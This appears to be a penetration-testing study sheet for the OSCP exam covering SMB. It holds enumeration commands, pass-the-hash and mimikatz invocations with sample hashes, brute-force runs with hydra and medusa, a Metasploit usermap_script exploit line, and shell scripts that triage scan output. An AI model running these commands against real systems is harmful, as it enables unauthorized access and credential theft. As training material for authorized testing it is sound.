OSCP Notes
SMB

Scanning for the NetBIOS Service

nmap -p 139,445 --open -oG smb.txt 192.168.1.0/24
nbtscan -r 192.168.1.0/24

Checklist

Enumerate Hostname

nmblookup -A $ip

List Shares

smbmap -H $ip
echo exit | smbclient -L \\\\$ip
nmap --script smb-enum-shares -p 139,445 $ip

Check Null Sessions

smbmap -H $ip
rpcclient -U "" -N $ip
smbclient -N \\\\$ip\\[share name]
# If smbclient fails with "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED",
# the server only speaks SMB1 and your client's minimum protocol is SMB2; allow NT1:
smbclient -L //10.10.10.3/ --option='client min protocol=NT1'

Check for Vulnerabilities

nmap --script 'smb-vuln*' -p 139,445 $ip   # quote the glob so the shell does not expand it

Overall Scan

enum4linux -a $ip
enum4linux -u 'guest' -p '' -a $ip

Manual Inspection

./smbver.sh $ip [port]   # script listed below; port defaults to 139

List smb nmap scripts

locate .nse | grep smb

Google to see if version is vulnerable

Samba 3.5.0 through 4.6.3 (4.5.x before 4.5.10, 4.4.x before 4.4.14)  # CVE-2017-7494, Metasploit linux/samba/is_known_pipename; needs a writable share
Samba 3.5.11                                                           # example of an affected version

Nmap Script

Quick enum

nmap --script 'smb-enum*' --script-args=unsafe=1 -T5 $ip

Quick vuln scan

nmap --script 'smb-vuln*' --script-args=unsafe=1 -T5 $ip
# unsafe=1 lets the vulnerability checks run tests that can crash the target service;
# -T5 is loud and can drop results on slow links. Drop both when stability matters.

Full enum and vuln scanning

nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode,smb-protocols,smb2-time,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery --script-args=unsafe=1 -T5 $ip
nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script 'not brute and not dos and smb-*' -vv -d $ip

Vulnerable versions

    1. Windows NT, 2000 and XP before SP2 (SMB1) - VULNERABLE: null sessions are allowed by default
    2. Windows 2003 and XP SP2 onwards - NOT VULNERABLE: null sessions are not allowed by default
    3. Most Samba (Unix) servers, depending on smb.conf (restrict anonymous, map to guest)
List of SMB versions and corresponding Windows versions:
    1. SMB1 – Windows 2000, XP and Windows 2003
    2. SMB2 – Windows Vista SP1 and Windows 2008
    3. SMB2.1 – Windows 7 and Windows 2008 R2
    4. SMB3 – Windows 8 and Windows 2012
    5. SMB3.02 – Windows 8.1 and Windows 2012 R2
    6. SMB3.1.1 – Windows 10 and Windows 2016
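
Which dialects a host offers and whether it requires signing decide the next step: SMBv1 still on means smb-vuln-ms17-010 is worth running, and the highest dialect bounds the Windows generation as in the list above. The script below is an added example, not part of the original notes; it pulls those facts out of the text nmap prints for the smb-protocols and smb2-security-mode scripts. The SAMPLE_* strings are constructed in the shape of that output (function names are mine), and the OS floor applies to Windows hosts only, since Samba speaks SMB2/3 as well.

```shell
#!/bin/sh
# Added example: triage nmap smb-protocols / smb2-security-mode output.
# Not part of the original notes. SAMPLE_* are constructed in the format nmap
# prints; for a real host use: nmap -p445 --script smb-protocols,smb2-security-mode $ip

SAMPLE_LEGACY='Host script results:
| smb-protocols:
|   dialects:
|     NT LM 0.12 (SMBv1) [dangerous, but default]
|     2.0.2
|     2.1
|     3.0
|     3.0.2
|_    3.1.1
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required'

SAMPLE_HARDENED='Host script results:
| smb-protocols:
|   dialects:
|     2.1
|     3.0
|     3.0.2
|_    3.1.1
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required'

# yes if the host still negotiates SMBv1 (precondition for MS17-010 / EternalBlue).
smb1_enabled() {
    case "$1" in *"(SMBv1)"*) echo yes ;; *) echo no ;; esac
}

# Highest dialect listed under smb-protocols, e.g. 3.1.1.
# Only the smb-protocols block is read (sed range ends at its "|_" line).
smb_highest_dialect() {
    printf '%s\n' "$1" | sed -n '/smb-protocols:/,/^|_/p' |
        grep -o '[0-9]\.[0-9][.0-9]*' | sort -t. -k1,1n -k2,2n -k3,3n | tail -n 1
}

# required / not-required / unknown, from the smb2-security-mode message.
smb_signing() {
    case "$1" in
        *"signing enabled and required"*) echo required ;;
        *"enabled but not required"*|*"signing disabled"*) echo not-required ;;
        *) echo unknown ;;
    esac
}

# Oldest Windows generation that ships the given top dialect (list above).
smb_os_floor() {
    case "$1" in
        3.1.1) echo "Windows 10 / Server 2016+" ;;
        3.0.2) echo "Windows 8.1 / Server 2012 R2" ;;
        3.0)   echo "Windows 8 / Server 2012" ;;
        2.1)   echo "Windows 7 / Server 2008 R2" ;;
        2.0*)  echo "Windows Vista SP1 / Server 2008" ;;
        *)     echo "SMB1 only: Windows 2000/XP/2003 era" ;;
    esac
}

# One-line verdict per host.
smb_triage() {
    top=$(smb_highest_dialect "$1")
    printf 'smbv1=%s top_dialect=%s signing=%s os_floor="%s"\n' \
        "$(smb1_enabled "$1")" "$top" "$(smb_signing "$1")" "$(smb_os_floor "$top")"
}

smb_triage "$SAMPLE_LEGACY"
smb_triage "$SAMPLE_HARDENED"
```

For a live target, capture the nmap output to a file and call `smb_triage "$(cat host.nmap)"`; the sed range keeps the dialect parse from picking up the version header that smb2-security-mode prints.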

CrackMapExec

# Current syntax is "crackmapexec smb <target> ..."; -H takes LM:NT or just the NT hash
crackmapexec smb $ip -u 'guest' -p '' --shares
crackmapexec smb $ip -u 'guest' -p '' --rid-brute 4000
crackmapexec smb $ip -u 'guest' -p '' --users
crackmapexec smb 192.168.1.0/24 -u Administrator -p '<password>'
crackmapexec smb 192.168.1.0/24 -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B
crackmapexec smb 192.168.1.0/24 -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -M mimikatz
crackmapexec smb $ip -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -x whoami
crackmapexec smb $ip -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B --exec-method smbexec -x whoami   # reliable pass-the-hash code execution

smbmap

Works well for listing and downloading files and for listing shares and permissions. Hashes work for authentication (-p LM:NT); command execution (-x) did not work.
smbmap -u '' -p '' -H $ip   # null session; similar to crackmapexec --shares
smbmap -u guest -p '' -H $ip
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip   # pass-the-hash; the LM half is the empty-LM constant
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -r   # list the top-level directory of each share
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -R   # list everything recursively
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '.*'   # download everything in the wwwroot share recursively to /usr/share/smbmap; useful when smbclient doesn't work
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -x whoami   # command execution did not work

Download all files

# inside an smbclient session
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *

Downloads a file in quiet mode

smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q

Recursively list dirs, and files

smbmap -R $sharename -H $ip
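
smbmap prints one tab-separated line per share (Disk, Permissions, Comment), and the decisions that follow are always the same: which shares can be written to, which can be read, and what server banner leaks in the IPC$ comment. The script below is an added example, not part of the original notes or of smbmap; SAMPLE_SMBMAP is constructed in that layout, and the function names are mine.

```shell
#!/bin/sh
# Added example (not part of the original notes): pick the actionable rows out of
# "smbmap -H $ip" output. SAMPLE_SMBMAP is constructed in smbmap's tab-separated
# Disk / Permissions / Comment layout (share name padded to 50 columns).
# Real use:  smbmap -H "$ip" > shares.txt; smbmap_writable "$(cat shares.txt)"

row() { printf '\t%-50s\t%s\t%s\n' "$1" "$2" "$3"; }

SAMPLE_SMBMAP=$(
    printf '[+] IP: 10.10.10.3:445\tName: 10.10.10.3\n'
    row 'Disk'   'Permissions' 'Comment'
    row '----'   '-----------' '-------'
    row 'print$' 'NO ACCESS'   'Printer Drivers'
    row 'tmp'    'READ, WRITE' 'oh noes!'
    row 'opt'    'NO ACCESS'   ''
    row 'docs'   'READ ONLY'   'shared documents'
    row 'IPC$'   'NO ACCESS'   'IPC Service (lame server (Samba 3.0.20-Debian))'
    row 'ADMIN$' 'NO ACCESS'   'IPC Service (lame server (Samba 3.0.20-Debian))'
)

# Share names whose permission column contains WRITE, one per line.
smbmap_writable() {
    printf '%s\n' "$1" | awk -F'\t' \
        '$3 ~ /WRITE/ { s = $2; gsub(/^[ \t]+|[ \t]+$/, "", s); print s }'
}

# Share names readable at all (READ ONLY or READ, WRITE), one per line.
smbmap_readable() {
    printf '%s\n' "$1" | awk -F'\t' \
        '$3 ~ /READ/ { s = $2; gsub(/^[ \t]+|[ \t]+$/, "", s); print s }'
}

# Server banner echoed in the IPC$ comment (e.g. "Samba 3.0.20-Debian"), if present.
smbmap_banner() {
    printf '%s\n' "$1" | awk -F'\t' '
        index($2, "IPC$") == 1 && match($4, /\(Samba [^)]*\)/) {
            print substr($4, RSTART + 1, RLENGTH - 2); exit
        }'
}

echo "writable: $(smbmap_writable "$SAMPLE_SMBMAP" | tr '\n' ' ')"
echo "readable: $(smbmap_readable "$SAMPLE_SMBMAP" | tr '\n' ' ')"
echo "banner:   $(smbmap_banner "$SAMPLE_SMBMAP")"
```

A writable share is what CVE-2017-7494 (is_known_pipename, listed further up) and most upload-based tricks need, so `smbmap_writable` is the first thing to check; the banner feeds the version lookup.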

smbver.sh

#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
# The version prints without dots (3020 = 3.0.20): tr strips the '.' that
# tcpdump -A uses for the UTF-16 padding bytes, and the real dots go with them.
# IFACE must be the interface that reaches the target (tap0 for the lab VPN).
IFACE="${IFACE:-tap0}"
if [ -z "$1" ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit 1; else rhost="$1"; fi
if [ -n "$2" ]; then rport="$2"; else rport=139; fi
tcpdump -s0 -n -i "$IFACE" src "$rhost" and port "$rport" -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & printf '%s: ' "$rhost" &
sleep 0.2   # give tcpdump a moment to start before the connection goes out
# -p forces smbclient onto the port tcpdump is filtering on (it would otherwise prefer 445)
echo "exit" | smbclient -L "$rhost" -p "$rport" 1>/dev/null 2>/dev/null
sleep 0.5 && echo ""

smbenum.sh

#!/bin/bash
# smbenum 0.2 - This script will enumerate SMB using every tool in the arsenal
# SECFORCE - Antonio Quina
# All credits to Bernardo Damele A. G. for the ms08-067_check.py script

if [ $# -eq 0 ]
then
    echo "Usage: $0 <IP>"
    echo "eg: $0 10.10.10.10"
    exit 1
else
    IP="$1"
fi
USERS="/tmp/$IP-users.txt"

echo -e "\n########## Getting Netbios name ##########"
nbtscan -v -h "$IP"

echo -e "\n########## Checking for NULL sessions ##########"
# -U% = empty username and empty password (null session)
echo 'srvinfo' | rpcclient "$IP" -U%

echo -e "\n########## Enumerating domains ##########"
echo 'enumdomains' | rpcclient "$IP" -U%

echo -e "\n########## Enumerating password and lockout policies ##########"
polenum "$IP"

echo -e "\n########## Enumerating users ##########"
nmap -Pn -T4 -sS -p139,445 --script=smb-enum-users "$IP"
# enumdomusers prints "user:[name] rid:[0x1f4]"; keep the name between the first brackets
users_raw=$(echo 'enumdomusers' | rpcclient "$IP" -U%)
echo "$users_raw"
echo "$users_raw" | cut -d[ -f2 | cut -d] -f1 > "$USERS"

echo -e "\n########## Enumerating Administrators ##########"
net rpc group members "Administrators" -I "$IP" -U%

echo -e "\n########## Enumerating Domain Admins ##########"
net rpc group members "Domain Admins" -I "$IP" -U%

echo -e "\n########## Enumerating groups ##########"
nmap -Pn -T4 -sS -p139,445 --script=smb-enum-groups "$IP"

echo -e "\n########## Enumerating shares ##########"
nmap -Pn -T4 -sS -p139,445 --script=smb-enum-shares "$IP"

echo -e "\n########## Bruteforcing all users with 'password', blank and username as password"
# -e ns adds the empty password and username-as-password; -t 1 keeps it to one attempt
# at a time. Check the lockout threshold polenum printed above before running this.
hydra -e ns -L "$USERS" -p password "$IP" smb -t 1
rm -f "$USERS"

Brute force login

# Check the lockout policy first (polenum / enum4linux); -t 1 keeps hydra to one attempt at a time
medusa -h $ip -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt
nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip -vvvv

Null Session

Query the NetBIOS name service first (no credentials needed), then try the null-session commands from the Checklist (rpcclient -U "" -N, smbclient -N).

nbtscan -r $ip

Version

msfconsole -q -x "use auxiliary/scanner/smb/smb_version; set RHOSTS $ip; run"

MultiExploit

# Samba usermap_script, CVE-2007-2447: Samba 3.0.20 through 3.0.25rc3
msfconsole -q -x "use exploit/multi/samba/usermap_script; set LHOST 10.10.14.x; set RHOSTS $ip; run"
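
Both the "Google to see if version is vulnerable" notes above and the usermap_script module here come down to a version-range check on the Samba banner. The script below is an added example, not part of the original notes or of Metasploit: it parses a banner such as "Samba 3.0.20-Debian" (as printed by smbver.sh, smbclient or nmap's smb-os-discovery) and reports whether it falls in the usermap_script range (3.0.20 to 3.0.25rc3) or the is_known_pipename range (3.5.0 onward, fixed in 4.4.14, 4.5.10 and 4.6.4). Function names and the banner shapes are assumptions; distro packages often backport the fix without bumping the version, so "yes" means "worth testing", not "confirmed".

```shell
#!/bin/sh
# Added example (not part of the original notes): triage a Samba banner against the
# two exploit ranges referenced on this page. Banner strings like "Samba 3.0.20-Debian"
# or "Unix Samba 4.5.9" are assumed. Backported distro fixes are invisible here, so a
# "yes" is a lead to verify, not a confirmed vulnerability.

# Print "major minor patch suffix" for the first x.y.z in the banner; print nothing if absent.
samba_parse_version() {
    printf '%s\n' "$1" | sed -n 's/^[^0-9]*//; s/^\([0-9]\{1,\}\)\.\([0-9]\{1,\}\)\.\([0-9]\{1,\}\)\([A-Za-z0-9]*\).*$/\1 \2 \3 \4/p'
}

# CVE-2007-2447 (Metasploit exploit/multi/samba/usermap_script): Samba 3.0.20 - 3.0.25rc3.
# Prints yes / no / unknown.
samba_usermap_vuln() {
    set -- $(samba_parse_version "$1")
    [ $# -ge 3 ] || { echo unknown; return 0; }
    maj=$1; min=$2; pat=$3; suf=${4:-}
    if [ "$maj" -eq 3 ] && [ "$min" -eq 0 ]; then
        if [ "$pat" -ge 20 ] && [ "$pat" -lt 25 ]; then echo yes; return 0; fi
        if [ "$pat" -eq 25 ]; then
            case "$suf" in rc*) echo yes; return 0 ;; esac   # 3.0.25rc3 affected, 3.0.25 final fixed
        fi
    fi
    echo no
}

# CVE-2017-7494 (exploit/linux/samba/is_known_pipename): every release from 3.5.0 onward
# until the fixes in 4.4.14, 4.5.10 and 4.6.4; 4.7+ never affected. Exploitation also needs
# a writable share and a guessable server-side path for the uploaded library.
samba_pipename_vuln() {
    set -- $(samba_parse_version "$1")
    [ $# -ge 3 ] || { echo unknown; return 0; }
    maj=$1; min=$2; pat=$3
    case "$maj.$min" in
        3.[5-9]|3.[1-9][0-9]) echo yes ;;
        4.[0-3])              echo yes ;;   # 4.0 - 4.3 were end-of-life, no fixed release
        4.4) [ "$pat" -lt 14 ] && echo yes || echo no ;;
        4.5) [ "$pat" -lt 10 ] && echo yes || echo no ;;
        4.6) [ "$pat" -lt 4 ]  && echo yes || echo no ;;
        *)   echo no ;;
    esac
}

# One line per banner with both verdicts.
samba_triage() {
    printf '%-24s usermap_script=%-7s is_known_pipename=%s\n' "$1" \
        "$(samba_usermap_vuln "$1")" "$(samba_pipename_vuln "$1")"
}

for banner in "Samba 3.0.20-Debian" "Samba 3.0.25rc3" "Samba 3.5.11" \
              "Samba 4.5.9" "Samba 4.6.4" "Samba 4.13.2-Ubuntu" "Windows 6.1"; do
    samba_triage "$banner"
done
```

Feed it whatever smbver.sh or `nmap --script smb-os-discovery` returns; a non-Samba banner (no x.y.z version) comes back as "unknown" rather than a false "no".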

Eternal Blue

Vulnerable versions

MS17-010: Windows Vista, 7, 8.1 and 10 and Windows Server 2008/2008 R2/2012/2012 R2/2016 without the March 2017 patch; Windows XP, 8 and Server 2003 received an out-of-band patch later. SMBv1 must be enabled on the target.
nmap -p 445 $ip --script=smb-vuln-ms17-010

Bruteforce password

hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 $ip smb

Connection

smbclient -L 192.168.1.102
smbclient //192.168.1.106/tmp
# backslash and forward-slash forms are equivalent (backslashes must be doubled for the shell)
smbclient \\\\192.168.1.105\\ipc$ -U john
smbclient //192.168.1.105/ipc$ -U john

Exploitation

    Gather version numbers
    Searchsploit
    Default Creds
    Creds previously gathered
    Download the software